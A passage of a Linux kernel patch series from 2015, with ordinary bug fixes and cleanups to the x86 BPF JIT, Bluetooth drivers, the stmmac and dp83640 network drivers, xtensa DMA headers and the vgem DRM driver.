shortest encoding for given bpf instruction. While doing so the jump targets are changing, so JIT is doing multiple passes over the program. Typical program needs 3 passes. Some very short programs converge with 2 passes. Large programs may need 4 or 5. But specially crafted bpf programs may hit the pass limit and if the program converges on the last iteration the JIT compiler will be producing an image full of 'int 3' insns. Fix this corner case by doing final iteration over bpf program. Fixes: 0a14842f5a3c ("net: filter: Just In Time compiler for x86-64") Reported-by: Daniel Borkmann Signed-off-by: Alexei Starovoitov Tested-by: Daniel Borkmann Acked-by: Daniel Borkmann Signed-off-by: David S. Miller --- arch/x86/net/bpf_jit_comp.c | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/arch/x86/net/bpf_jit_comp.c b/arch/x86/net/bpf_jit_comp.c index 99f76103c6b7..ddeff4844a10 100644 --- a/arch/x86/net/bpf_jit_comp.c +++ b/arch/x86/net/bpf_jit_comp.c @@ -966,7 +966,12 @@ void bpf_int_jit_compile(struct bpf_prog *prog) } ctx.cleanup_addr = proglen; - for (pass = 0; pass < 10; pass++) { + /* JITed image shrinks with every pass and the loop iterates + * until the image stops shrinking. Very large bpf programs + * may converge on the last pass. In such case do one more + * pass to emit the final image + */ + for (pass = 0; pass < 10 || image; pass++) { proglen = do_jit(prog, addrs, image, oldproglen, &ctx); if (proglen <= 0) { image = NULL; From 7f6e63631dbd7fd6689b4ee301d0eea0f34c5535 Mon Sep 17 00:00:00 2001 From: Chan-yeol Park Date: Thu, 21 May 2015 11:24:27 +0900 Subject: [PATCH 180/872] Bluetooth: btusb: Support QCA61x4 ROME v2.0 The previous commit(3267c88) missed QCA61x4 ROME v2.0 info on Samsung so its BT is not activated and the below message is shown. [ 8.009638] usb 1-1: New USB device found, idVendor=0cf3, idProduct=e300 [ 8.012637] usb 1-1: New USB device strings: Mfr=0, Product=0, SerialNumber=0 [ 8.102901] Bluetooth: hci0: don't support firmware rome 0x200 This patch adds QCA61x4 ROME v2.0 info in qca_devices_table[], and is verified on Samsung with the firmware provided by Kim, Ben Young Tae . 
T: Bus=01 Lev=01 Prnt=01 Port=00 Cnt=01 Dev#= 2 Spd=12 MxCh= 0 D: Ver= 1.10 Cls=e0(wlcon) Sub=01 Prot=01 MxPS=64 #Cfgs= 1 P: Vendor=0cf3 ProdID=e300 Rev= 0.01 C:* #Ifs= 2 Cfg#= 1 Atr=e0 MxPwr=100mA I:* If#= 0 Alt= 0 #EPs= 3 Cls=e0(wlcon) Sub=01 Prot=01 Driver=btusb E: Ad=81(I) Atr=03(Int.) MxPS= 16 Ivl=1ms E: Ad=82(I) Atr=02(Bulk) MxPS= 64 Ivl=0ms E: Ad=02(O) Atr=02(Bulk) MxPS= 64 Ivl=0ms I:* If#= 1 Alt= 0 #EPs= 2 Cls=e0(wlcon) Sub=01 Prot=01 Driver=btusb E: Ad=83(I) Atr=01(Isoc) MxPS= 0 Ivl=1ms E: Ad=03(O) Atr=01(Isoc) MxPS= 0 Ivl=1ms I: If#= 1 Alt= 1 #EPs= 2 Cls=e0(wlcon) Sub=01 Prot=01 Driver=btusb E: Ad=83(I) Atr=01(Isoc) MxPS= 9 Ivl=1ms E: Ad=03(O) Atr=01(Isoc) MxPS= 9 Ivl=1ms I: If#= 1 Alt= 2 #EPs= 2 Cls=e0(wlcon) Sub=01 Prot=01 Driver=btusb E: Ad=83(I) Atr=01(Isoc) MxPS= 17 Ivl=1ms E: Ad=03(O) Atr=01(Isoc) MxPS= 17 Ivl=1ms I: If#= 1 Alt= 3 #EPs= 2 Cls=e0(wlcon) Sub=01 Prot=01 Driver=btusb E: Ad=83(I) Atr=01(Isoc) MxPS= 25 Ivl=1ms E: Ad=03(O) Atr=01(Isoc) MxPS= 25 Ivl=1ms I: If#= 1 Alt= 4 #EPs= 2 Cls=e0(wlcon) Sub=01 Prot=01 Driver=btusb E: Ad=83(I) Atr=01(Isoc) MxPS= 33 Ivl=1ms E: Ad=03(O) Atr=01(Isoc) MxPS= 33 Ivl=1ms I: If#= 1 Alt= 5 #EPs= 2 Cls=e0(wlcon) Sub=01 Prot=01 Driver=btusb E: Ad=83(I) Atr=01(Isoc) MxPS= 49 Ivl=1ms E: Ad=03(O) Atr=01(Isoc) MxPS= 49 Ivl=1ms Signed-off-by: Chan-yeol Park Signed-off-by: Marcel Holtmann --- drivers/bluetooth/btusb.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c index b9f282112153..c334620c07b3 100644 --- a/drivers/bluetooth/btusb.c +++ b/drivers/bluetooth/btusb.c @@ -2382,6 +2382,7 @@ struct qca_device_info { static const struct qca_device_info qca_devices_table[] = { { 0x00000100, 20, 4, 10 }, /* Rome 1.0 */ { 0x00000101, 20, 4, 10 }, /* Rome 1.1 */ + { 0x00000200, 28, 4, 18 }, /* Rome 2.0 */ { 0x00000201, 28, 4, 18 }, /* Rome 2.1 */ { 0x00000300, 28, 4, 18 }, /* Rome 3.0 */ { 0x00000302, 28, 4, 18 }, /* Rome 3.2 */ From 917a33379258c137324cb9204e2f2f6ed8dc2b78 Mon Sep 17 00:00:00 2001 From: Shailendra Verma Date: Mon, 25 May 2015 23:53:40 +0530 Subject: [PATCH 181/872] Bluetooth: btusb: Change 1 to true in bool type variable assignment The reset is a bool type variable. So assigning true to reset instead of 1. Signed-off-by: Shailendra Verma Signed-off-by: Marcel Holtmann --- drivers/bluetooth/btusb.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c index c334620c07b3..8ff0e162341d 100644 --- a/drivers/bluetooth/btusb.c +++ b/drivers/bluetooth/btusb.c @@ -38,7 +38,7 @@ static bool disable_scofix; static bool force_scofix; -static bool reset = 1; +static bool reset = true; static struct usb_driver btusb_driver; From bff6b89f86f5f4884e844300c5dc729b3d405681 Mon Sep 17 00:00:00 2001 From: Shailendra Verma Date: Tue, 26 May 2015 00:00:57 +0530 Subject: [PATCH 182/872] Bluetooth: hci_uart: Change 1 to true for bool type variables assignments The variables txcrc and hciextn are bool type. So assigning true instead of 1. 
Signed-off-by: Shailendra Verma Signed-off-by: Marcel Holtmann --- drivers/bluetooth/hci_bcsp.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/bluetooth/hci_bcsp.c b/drivers/bluetooth/hci_bcsp.c index dc8e3d4356a0..fc0056a28b81 100644 --- a/drivers/bluetooth/hci_bcsp.c +++ b/drivers/bluetooth/hci_bcsp.c @@ -47,8 +47,8 @@ #include "hci_uart.h" -static bool txcrc = 1; -static bool hciextn = 1; +static bool txcrc = true; +static bool hciextn = true; #define BCSP_TXWINSIZE 4 From 04b8c8143d46453a443ac32bfcd76ec952605765 Mon Sep 17 00:00:00 2001 From: Daniel Drake Date: Thu, 21 May 2015 08:23:50 -0600 Subject: [PATCH 183/872] Bluetooth: btusb: fix Realtek suspend/resume Realtek btusb devices don't currently work after suspend/resume because the updated firmware is quietly lost - the USB hub doesn't notice any status change upon resume, but some kind of reset has definitely happened as the LMP subversion has reverted to its original value. Set the reset_resume flag to trigger probe and upload the new firmware again. Like the vendor code, I assume this is not needed when the device is selected as a wakeup source and hence will retain power during suspend. On the 2 products I have to hand, when trying this configuration the hardware seems unable to keep the device powered up during suspend. The USB hub then detects a status change on resume and does a reset, so we do not end up in broken state. Signed-off-by: Daniel Drake Signed-off-by: Marcel Holtmann --- drivers/bluetooth/btusb.c | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c index 8ff0e162341d..a92811468542 100644 --- a/drivers/bluetooth/btusb.c +++ b/drivers/bluetooth/btusb.c @@ -328,6 +328,7 @@ static const struct usb_device_id blacklist_table[] = { #define BTUSB_FIRMWARE_LOADED 7 #define BTUSB_FIRMWARE_FAILED 8 #define BTUSB_BOOTING 9 +#define BTUSB_RESET_RESUME 10 struct btusb_data { struct hci_dev *hdev; @@ -2767,8 +2768,15 @@ static int btusb_probe(struct usb_interface *intf, } #ifdef CONFIG_BT_HCIBTUSB_RTL - if (id->driver_info & BTUSB_REALTEK) + if (id->driver_info & BTUSB_REALTEK) { hdev->setup = btrtl_setup_realtek; + + /* Realtek devices lose their updated firmware over suspend, + * but the USB hub doesn't notice any status change. + * Explicitly request a device reset on resume. + */ + set_bit(BTUSB_RESET_RESUME, &data->flags); + } #endif if (id->driver_info & BTUSB_AMP) { @@ -2901,6 +2909,14 @@ static int btusb_suspend(struct usb_interface *intf, pm_message_t message) btusb_stop_traffic(data); usb_kill_anchored_urbs(&data->tx_anchor); + /* Optionally request a device reset on resume, but only when + * wakeups are disabled. If wakeups are enabled we assume the + * device will stay powered up throughout suspend. + */ + if (test_bit(BTUSB_RESET_RESUME, &data->flags) && + !device_may_wakeup(&data->udev->dev)) + data->udev->reset_resume = 1; + return 0; } From 5369c71f7ca24f6472f8fa883e05fa7469fab284 Mon Sep 17 00:00:00 2001 From: Ivan Mikhaylov Date: Thu, 21 May 2015 19:11:02 +0400 Subject: [PATCH 184/872] net/ibm/emac: fix size of emac dump memory areas Fix the size of the EMAC register dump sent to ethtool, which was causing wrong data interpretation on the ethtool layer for MII and EMAC. Signed-off-by: Ivan Mikhaylov Signed-off-by: David S.
Miller --- drivers/net/ethernet/ibm/emac/core.c | 16 ++++++---------- drivers/net/ethernet/ibm/emac/core.h | 7 ++----- 2 files changed, 8 insertions(+), 15 deletions(-) diff --git a/drivers/net/ethernet/ibm/emac/core.c b/drivers/net/ethernet/ibm/emac/core.c index de7919322190..b9df0cbd0a38 100644 --- a/drivers/net/ethernet/ibm/emac/core.c +++ b/drivers/net/ethernet/ibm/emac/core.c @@ -2084,12 +2084,8 @@ static void emac_ethtool_get_pauseparam(struct net_device *ndev, static int emac_get_regs_len(struct emac_instance *dev) { - if (emac_has_feature(dev, EMAC_FTR_EMAC4)) - return sizeof(struct emac_ethtool_regs_subhdr) + - EMAC4_ETHTOOL_REGS_SIZE(dev); - else return sizeof(struct emac_ethtool_regs_subhdr) + - EMAC_ETHTOOL_REGS_SIZE(dev); + sizeof(struct emac_regs); } static int emac_ethtool_get_regs_len(struct net_device *ndev) @@ -2114,15 +2110,15 @@ static void *emac_dump_regs(struct emac_instance *dev, void *buf) struct emac_ethtool_regs_subhdr *hdr = buf; hdr->index = dev->cell_index; - if (emac_has_feature(dev, EMAC_FTR_EMAC4)) { + if (emac_has_feature(dev, EMAC_FTR_EMAC4SYNC)) { + hdr->version = EMAC4SYNC_ETHTOOL_REGS_VER; + } else if (emac_has_feature(dev, EMAC_FTR_EMAC4)) { hdr->version = EMAC4_ETHTOOL_REGS_VER; - memcpy_fromio(hdr + 1, dev->emacp, EMAC4_ETHTOOL_REGS_SIZE(dev)); - return (void *)(hdr + 1) + EMAC4_ETHTOOL_REGS_SIZE(dev); } else { hdr->version = EMAC_ETHTOOL_REGS_VER; - memcpy_fromio(hdr + 1, dev->emacp, EMAC_ETHTOOL_REGS_SIZE(dev)); - return (void *)(hdr + 1) + EMAC_ETHTOOL_REGS_SIZE(dev); } + memcpy_fromio(hdr + 1, dev->emacp, sizeof(struct emac_regs)); + return (void *)(hdr + 1) + sizeof(struct emac_regs); } static void emac_ethtool_get_regs(struct net_device *ndev, diff --git a/drivers/net/ethernet/ibm/emac/core.h b/drivers/net/ethernet/ibm/emac/core.h index 67f342a9f65e..28df37420da9 100644 --- a/drivers/net/ethernet/ibm/emac/core.h +++ b/drivers/net/ethernet/ibm/emac/core.h @@ -461,10 +461,7 @@ struct emac_ethtool_regs_subhdr { }; #define EMAC_ETHTOOL_REGS_VER 0 -#define EMAC_ETHTOOL_REGS_SIZE(dev) ((dev)->rsrc_regs.end - \ - (dev)->rsrc_regs.start + 1) -#define EMAC4_ETHTOOL_REGS_VER 1 -#define EMAC4_ETHTOOL_REGS_SIZE(dev) ((dev)->rsrc_regs.end - \ - (dev)->rsrc_regs.start + 1) +#define EMAC4_ETHTOOL_REGS_VER 1 +#define EMAC4SYNC_ETHTOOL_REGS_VER 2 #endif /* __IBM_NEWEMAC_CORE_H */ From 466c5ac8bdf29a382d064923a60ef302dd3b2aeb Mon Sep 17 00:00:00 2001 From: Mathieu Olivari Date: Fri, 22 May 2015 19:03:29 -0700 Subject: [PATCH 185/872] net: stmmac: create one debugfs dir per net-device stmmac DebugFS entries are currently global to the driver. As a result, having more than one stmmac device in the system creates the following error: * ERROR stmmaceth, debugfs create directory failed * stmmac_hw_setup: failed debugFS registration This also results in being able to access the debugfs information for the first registered device only. This patch changes the debugfs structure to have one sub-directory per net-device. Files under "/sys/kernel/debug/stmmaceth" will now show-up under /sys/kernel/debug/stmmaceth/ethN/. Signed-off-by: Mathieu Olivari Signed-off-by: David S. 
Miller --- drivers/net/ethernet/stmicro/stmmac/stmmac.h | 6 ++ .../net/ethernet/stmicro/stmmac/stmmac_main.c | 76 +++++++++++++------ 2 files changed, 59 insertions(+), 23 deletions(-) diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac.h b/drivers/net/ethernet/stmicro/stmmac/stmmac.h index 2ac9552d1fa3..73bab983edd9 100644 --- a/drivers/net/ethernet/stmicro/stmmac/stmmac.h +++ b/drivers/net/ethernet/stmicro/stmmac/stmmac.h @@ -117,6 +117,12 @@ struct stmmac_priv { int use_riwt; int irq_wake; spinlock_t ptp_lock; + +#ifdef CONFIG_DEBUG_FS + struct dentry *dbgfs_dir; + struct dentry *dbgfs_rings_status; + struct dentry *dbgfs_dma_cap; +#endif }; int stmmac_mdio_unregister(struct net_device *ndev); diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c index 05c146f718a3..2c5ce2baca87 100644 --- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c +++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c @@ -118,7 +118,7 @@ static irqreturn_t stmmac_interrupt(int irq, void *dev_id); #ifdef CONFIG_DEBUG_FS static int stmmac_init_fs(struct net_device *dev); -static void stmmac_exit_fs(void); +static void stmmac_exit_fs(struct net_device *dev); #endif #define STMMAC_COAL_TIMER(x) (jiffies + usecs_to_jiffies(x)) @@ -1916,7 +1916,7 @@ static int stmmac_release(struct net_device *dev) netif_carrier_off(dev); #ifdef CONFIG_DEBUG_FS - stmmac_exit_fs(); + stmmac_exit_fs(dev); #endif stmmac_release_ptp(priv); @@ -2508,8 +2508,6 @@ static int stmmac_ioctl(struct net_device *dev, struct ifreq *rq, int cmd) #ifdef CONFIG_DEBUG_FS static struct dentry *stmmac_fs_dir; -static struct dentry *stmmac_rings_status; -static struct dentry *stmmac_dma_cap; static void sysfs_display_ring(void *head, int size, int extend_desc, struct seq_file *seq) @@ -2648,36 +2646,39 @@ static const struct file_operations stmmac_dma_cap_fops = { static int stmmac_init_fs(struct net_device *dev) { - /* Create debugfs entries */ - stmmac_fs_dir = debugfs_create_dir(STMMAC_RESOURCE_NAME, NULL); + struct stmmac_priv *priv = netdev_priv(dev); + + /* Create per netdev entries */ + priv->dbgfs_dir = debugfs_create_dir(dev->name, stmmac_fs_dir); - if (!stmmac_fs_dir || IS_ERR(stmmac_fs_dir)) { - pr_err("ERROR %s, debugfs create directory failed\n", - STMMAC_RESOURCE_NAME); + if (!priv->dbgfs_dir || IS_ERR(priv->dbgfs_dir)) { + pr_err("ERROR %s/%s, debugfs create directory failed\n", + STMMAC_RESOURCE_NAME, dev->name); return -ENOMEM; } /* Entry to report DMA RX/TX rings */ - stmmac_rings_status = debugfs_create_file("descriptors_status", - S_IRUGO, stmmac_fs_dir, dev, - &stmmac_rings_status_fops); + priv->dbgfs_rings_status = + debugfs_create_file("descriptors_status", S_IRUGO, + priv->dbgfs_dir, dev, + &stmmac_rings_status_fops); - if (!stmmac_rings_status || IS_ERR(stmmac_rings_status)) { + if (!priv->dbgfs_rings_status || IS_ERR(priv->dbgfs_rings_status)) { pr_info("ERROR creating stmmac ring debugfs file\n"); - debugfs_remove(stmmac_fs_dir); + debugfs_remove_recursive(priv->dbgfs_dir); return -ENOMEM; } /* Entry to report the DMA HW features */ - stmmac_dma_cap = debugfs_create_file("dma_cap", S_IRUGO, stmmac_fs_dir, - dev, &stmmac_dma_cap_fops); + priv->dbgfs_dma_cap = debugfs_create_file("dma_cap", S_IRUGO, + priv->dbgfs_dir, + dev, &stmmac_dma_cap_fops); - if (!stmmac_dma_cap || IS_ERR(stmmac_dma_cap)) { + if (!priv->dbgfs_dma_cap || IS_ERR(priv->dbgfs_dma_cap)) { pr_info("ERROR creating stmmac MMC debugfs file\n"); - debugfs_remove(stmmac_rings_status); - 
debugfs_remove(stmmac_fs_dir); + debugfs_remove_recursive(priv->dbgfs_dir); return -ENOMEM; } @@ -2685,11 +2686,11 @@ static int stmmac_init_fs(struct net_device *dev) return 0; } -static void stmmac_exit_fs(void) +static void stmmac_exit_fs(struct net_device *dev) { - debugfs_remove(stmmac_rings_status); - debugfs_remove(stmmac_dma_cap); - debugfs_remove(stmmac_fs_dir); + struct stmmac_priv *priv = netdev_priv(dev); + + debugfs_remove_recursive(priv->dbgfs_dir); } #endif /* CONFIG_DEBUG_FS */ @@ -3149,6 +3150,35 @@ static int __init stmmac_cmdline_opt(char *str) __setup("stmmaceth=", stmmac_cmdline_opt); #endif /* MODULE */ +static int __init stmmac_init(void) +{ +#ifdef CONFIG_DEBUG_FS + /* Create debugfs main directory if it doesn't exist yet */ + if (!stmmac_fs_dir) { + stmmac_fs_dir = debugfs_create_dir(STMMAC_RESOURCE_NAME, NULL); + + if (!stmmac_fs_dir || IS_ERR(stmmac_fs_dir)) { + pr_err("ERROR %s, debugfs create directory failed\n", + STMMAC_RESOURCE_NAME); + + return -ENOMEM; + } + } +#endif + + return 0; +} + +static void __exit stmmac_exit(void) +{ +#ifdef CONFIG_DEBUG_FS + debugfs_remove_recursive(stmmac_fs_dir); +#endif +} + +module_init(stmmac_init) +module_exit(stmmac_exit) + MODULE_DESCRIPTION("STMMAC 10/100/1000 Ethernet device driver"); MODULE_AUTHOR("Giuseppe Cavallaro "); MODULE_LICENSE("GPL"); From 397a253af5031de4a4612210055935309af4472c Mon Sep 17 00:00:00 2001 From: Richard Cochran Date: Mon, 25 May 2015 11:55:43 +0200 Subject: [PATCH 186/872] net: dp83640: fix broken calibration routine. Currently, the calibration function that corrects the initial offsets among multiple devices only works the first time. If the function is called more than once, the calibration fails and bogus offsets will be programmed into the devices. In a well hidden spot, the device documentation tells that trigger indexes 0 and 1 are special in allowing the TRIG_IF_LATE flag to actually work. This patch fixes the issue by using one of the special triggers during the recalibration method. Signed-off-by: Richard Cochran Signed-off-by: David S. Miller --- drivers/net/phy/dp83640.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/phy/dp83640.c b/drivers/net/phy/dp83640.c index 496e02f961d3..7a068d99ea46 100644 --- a/drivers/net/phy/dp83640.c +++ b/drivers/net/phy/dp83640.c @@ -47,7 +47,7 @@ #define PSF_TX 0x1000 #define EXT_EVENT 1 #define CAL_EVENT 7 -#define CAL_TRIGGER 7 +#define CAL_TRIGGER 1 #define DP83640_N_PINS 12 #define MII_DP83640_MICR 0x11 From a935865c828c8cd20501f618c69f659a5b6d6a5f Mon Sep 17 00:00:00 2001 From: Richard Cochran Date: Mon, 25 May 2015 11:55:44 +0200 Subject: [PATCH 187/872] net: dp83640: reinforce locking rules. Callers of the ext_write function are supposed to hold a mutex that protects the state of the dialed page, but one caller was missing the lock from the very start, and over time the code has been changed without following the rule. This patch cleans up the call sites in violation of the rule. Signed-off-by: Richard Cochran Signed-off-by: David S. 
Miller --- drivers/net/phy/dp83640.c | 17 ++++++++++++++++- 1 file changed, 16 insertions(+), 1 deletion(-) diff --git a/drivers/net/phy/dp83640.c b/drivers/net/phy/dp83640.c index 7a068d99ea46..e570036275e2 100644 --- a/drivers/net/phy/dp83640.c +++ b/drivers/net/phy/dp83640.c @@ -496,7 +496,9 @@ static int ptp_dp83640_enable(struct ptp_clock_info *ptp, else evnt |= EVNT_RISE; } + mutex_lock(&clock->extreg_lock); ext_write(0, phydev, PAGE5, PTP_EVNT, evnt); + mutex_unlock(&clock->extreg_lock); return 0; case PTP_CLK_REQ_PEROUT: @@ -532,6 +534,8 @@ static u8 status_frame_src[6] = { 0x08, 0x00, 0x17, 0x0B, 0x6B, 0x0F }; static void enable_status_frames(struct phy_device *phydev, bool on) { + struct dp83640_private *dp83640 = phydev->priv; + struct dp83640_clock *clock = dp83640->clock; u16 cfg0 = 0, ver; if (on) @@ -539,9 +543,13 @@ static void enable_status_frames(struct phy_device *phydev, bool on) ver = (PSF_PTPVER & VERSIONPTP_MASK) << VERSIONPTP_SHIFT; + mutex_lock(&clock->extreg_lock); + ext_write(0, phydev, PAGE5, PSF_CFG0, cfg0); ext_write(0, phydev, PAGE6, PSF_CFG1, ver); + mutex_unlock(&clock->extreg_lock); + if (!phydev->attached_dev) { pr_warn("expected to find an attached netdevice\n"); return; @@ -1173,11 +1181,18 @@ static int dp83640_config_init(struct phy_device *phydev) if (clock->chosen && !list_empty(&clock->phylist)) recalibrate(clock); - else + else { + mutex_lock(&clock->extreg_lock); enable_broadcast(phydev, clock->page, 1); + mutex_unlock(&clock->extreg_lock); + } enable_status_frames(phydev, true); + + mutex_lock(&clock->extreg_lock); ext_write(0, phydev, PAGE4, PTP_CTL, PTP_ENABLE); + mutex_unlock(&clock->extreg_lock); + return 0; } From adbe088f6f8b0b7701fe07f51fe6f2bd602a6665 Mon Sep 17 00:00:00 2001 From: Richard Cochran Date: Mon, 25 May 2015 11:55:45 +0200 Subject: [PATCH 188/872] net: dp83640: fix improper double spin locking. A pair of nested spin locks was introduced in commit 63502b8d0 "dp83640: Fix receive timestamp race condition". Unfortunately the 'flags' parameter was reused for the inner lock, clobbering the originally saved IRQ state. This patch fixes the issue by changing the inner lock to plain spin_lock without irqsave. Signed-off-by: Richard Cochran Signed-off-by: David S. Miller --- drivers/net/phy/dp83640.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/phy/dp83640.c b/drivers/net/phy/dp83640.c index e570036275e2..00cb41e71312 100644 --- a/drivers/net/phy/dp83640.c +++ b/drivers/net/phy/dp83640.c @@ -846,7 +846,7 @@ static void decode_rxts(struct dp83640_private *dp83640, list_del_init(&rxts->list); phy2rxts(phy_rxts, rxts); - spin_lock_irqsave(&dp83640->rx_queue.lock, flags); + spin_lock(&dp83640->rx_queue.lock); skb_queue_walk(&dp83640->rx_queue, skb) { struct dp83640_skb_info *skb_info; @@ -861,7 +861,7 @@ static void decode_rxts(struct dp83640_private *dp83640, break; } } - spin_unlock_irqrestore(&dp83640->rx_queue.lock, flags); + spin_unlock(&dp83640->rx_queue.lock); if (!shhwtstamps) list_add_tail(&rxts->list, &dp83640->rxts); From e74993aef4411995960052506a000f94411a7103 Mon Sep 17 00:00:00 2001 From: Guenter Roeck Date: Mon, 4 May 2015 15:30:47 -0700 Subject: [PATCH 189/872] xtensa: Provide dummy dma_alloc_attrs() and dma_free_attrs() MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit xtensa:allmodconfig fails to build with the following errors. 
drivers/gpu/drm/nouveau/nvkm/subdev/instmem/gk20a.c: In function ‘gk20a_instobj_dtor_dma’: drivers/gpu/drm/nouveau/nvkm/subdev/instmem/gk20a.c:154:2: error: implicit declaration of function ‘dma_free_attrs’ drivers/gpu/drm/nouveau/nvkm/subdev/instmem/gk20a.c: In function ‘gk20a_instobj_ctor_dma’: drivers/gpu/drm/nouveau/nvkm/subdev/instmem/gk20a.c:218:2: error: implicit declaration of function ‘dma_alloc_attrs’ Xtensa does not provide those functions at this time. Provide dummy implementations to avoid build errors. Acked-by: Max Filippov Signed-off-by: Guenter Roeck Signed-off-by: Chris Zankel --- arch/xtensa/include/asm/dma-mapping.h | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/arch/xtensa/include/asm/dma-mapping.h b/arch/xtensa/include/asm/dma-mapping.h index 172a02a6ad14..ba78ccf651e7 100644 --- a/arch/xtensa/include/asm/dma-mapping.h +++ b/arch/xtensa/include/asm/dma-mapping.h @@ -185,4 +185,17 @@ static inline int dma_get_sgtable(struct device *dev, struct sg_table *sgt, return -EINVAL; } +static inline void *dma_alloc_attrs(struct device *dev, size_t size, + dma_addr_t *dma_handle, gfp_t flag, + struct dma_attrs *attrs) +{ + return NULL; +} + +static inline void dma_free_attrs(struct device *dev, size_t size, + void *vaddr, dma_addr_t dma_handle, + struct dma_attrs *attrs) +{ +} + #endif /* _XTENSA_DMA_MAPPING_H */ From f72186d22aad44100e2dd17ccdcf13c4418ec3cb Mon Sep 17 00:00:00 2001 From: Florian Grandel Date: Tue, 26 May 2015 03:31:09 +0200 Subject: [PATCH 190/872] Bluetooth: mgmt: fix typos A few comments had minor typos. These are being fixed. Signed-off-by: Florian Grandel Signed-off-by: Marcel Holtmann --- net/bluetooth/mgmt.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c index 7fd87e7135b5..a6f21f8c2f98 100644 --- a/net/bluetooth/mgmt.c +++ b/net/bluetooth/mgmt.c @@ -7577,7 +7577,7 @@ void mgmt_new_ltk(struct hci_dev *hdev, struct smp_ltk *key, bool persistent) memset(&ev, 0, sizeof(ev)); /* Devices using resolvable or non-resolvable random addresses - * without providing an indentity resolving key don't require + * without providing an identity resolving key don't require * to store long term keys. Their addresses will change the * next time around. * @@ -7617,7 +7617,7 @@ void mgmt_new_irk(struct hci_dev *hdev, struct smp_irk *irk) /* For identity resolving keys from devices that are already * using a public address or static random address, do not * ask for storing this key. The identity resolving key really - * is only mandatory for devices using resovlable random + * is only mandatory for devices using resolvable random * addresses. * * Storing all identity resolving keys has the downside that @@ -7646,7 +7646,7 @@ void mgmt_new_csrk(struct hci_dev *hdev, struct smp_csrk *csrk, memset(&ev, 0, sizeof(ev)); /* Devices using resolvable or non-resolvable random addresses - * without providing an indentity resolving key don't require + * without providing an identity resolving key don't require * to store signature resolving keys. Their addresses will change * the next time around. * From 990ed2720717173bbdea4cfb2bad37cc7aa91495 Mon Sep 17 00:00:00 2001 From: Rob Clark Date: Thu, 21 May 2015 11:58:30 -0400 Subject: [PATCH 191/872] drm/vgem: drop DRIVER_PRIME (v2) For actual sharing of buffers with other drivers (ie. actual hardware) we'll need to pimp things out a bit better to deal w/ caching, multiple memory domains, etc. 
See thread: http://lists.freedesktop.org/archives/dri-devel/2015-May/083160.html But for the llvmpipe use-case this isn't a problem. Nor do we really need prime/dri3 (dri2 is sufficient). So until the other issues are sorted lets remove DRIVER_PRIME. v2: also drop the dead code [airlied: Okay I'm convinced this API could have a lot of use cases that are really really bad, yes the upload use case is valid however that isn't the only use case enabled, and if we allow all the other use cases, people will start to (ab)use them, and then they'll be ABI and my life will get worse, so disable PRIME for now] Acked-by: Thomas Hellstrom Acked-by: Daniel Vetter Signed-off-by: Rob Clark Signed-off-by: Dave Airlie --- drivers/gpu/drm/vgem/Makefile | 2 +- drivers/gpu/drm/vgem/vgem_dma_buf.c | 94 ----------------------------- drivers/gpu/drm/vgem/vgem_drv.c | 11 +--- drivers/gpu/drm/vgem/vgem_drv.h | 11 ---- 4 files changed, 2 insertions(+), 116 deletions(-) delete mode 100644 drivers/gpu/drm/vgem/vgem_dma_buf.c diff --git a/drivers/gpu/drm/vgem/Makefile b/drivers/gpu/drm/vgem/Makefile index 1055cb79096c..3f4c7b842028 100644 --- a/drivers/gpu/drm/vgem/Makefile +++ b/drivers/gpu/drm/vgem/Makefile @@ -1,4 +1,4 @@ ccflags-y := -Iinclude/drm -vgem-y := vgem_drv.o vgem_dma_buf.o +vgem-y := vgem_drv.o obj-$(CONFIG_DRM_VGEM) += vgem.o diff --git a/drivers/gpu/drm/vgem/vgem_dma_buf.c b/drivers/gpu/drm/vgem/vgem_dma_buf.c deleted file mode 100644 index 0254438ad1a6..000000000000 --- a/drivers/gpu/drm/vgem/vgem_dma_buf.c +++ /dev/null @@ -1,94 +0,0 @@ -/* - * Copyright © 2012 Intel Corporation - * Copyright © 2014 The Chromium OS Authors - * - * Permission is hereby granted, free of charge, to any person obtaining a - * copy of this software and associated documentation files (the "Software"), - * to deal in the Software without restriction, including without limitation - * the rights to use, copy, modify, merge, publish, distribute, sublicense, - * and/or sell copies of the Software, and to permit persons to whom the - * Software is furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice (including the next - * paragraph) shall be included in all copies or substantial portions of the - * Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL - * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING - * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS - * IN THE SOFTWARE. 
